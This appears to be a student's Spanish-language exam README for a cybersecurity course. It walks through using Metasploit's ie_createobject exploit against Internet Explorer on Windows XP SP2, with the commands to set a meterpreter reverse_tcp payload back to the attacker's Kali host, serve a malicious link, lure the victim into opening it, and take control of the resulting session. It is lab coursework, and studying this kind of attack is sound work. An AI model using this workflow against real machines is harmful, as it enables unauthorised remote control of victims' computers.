# Parcial Ciberseguridad

Repositorio del parcial de ciberseguridad
Exploit:
exploit/windows/browser/ie_createobject

Vulnerabilidad: Este módulo explota la vulnerabilidad de ejecución de código genérico en Internet Explorer al abusar de objetos ActiveX vulnerables
Sistema operativo: Windows XP SP2
Software: Internet Explorer
Instructivo:

Primero abrimos Kali Linux
en la consola excribimos lo siguiente para abrir MetaSploit:
# msfconsole
ahora escribimos
# use exploit/windows/browser/ie_createobject
con esto empezamos el exploir ahora corremos las siguientes lineas:
cambiamos el payload
# set payload windows/meterpreter/reverse_tcp
cambiamos el lhost y ponemos el de kali
# set lhost 192.168.0.35
cambiamos el srvhost y nuevamente ponemos la de kali
# set srvhost 192.168.0.35
cambiamos la url del ataque
# set uripath ciber
y ejecutamos el exploit
# exploit
esto genera una url que deberia ser enviada al ordenador del ataque y pedir que entre
## http://192.168.0.35:8080/ciber

luego de que el ordenador entre al link procedemos a escribir
# sessions -l
con esto vemos las sesiones activas
ahora escogemos la sesion que vamos a atacar con el comando
# sessions -i (ID de la sesion que vamos a escoger)
una vez hecho esto y nos aparezca 
# meterpreter>
ya estaremos dentro de la maquina para el ataque y podemos ejecutar comandos desde ahi.


link video: https://youtu.be/itjmxOl-xkQ

Realizado por Elias Avilez Ramos 1152469971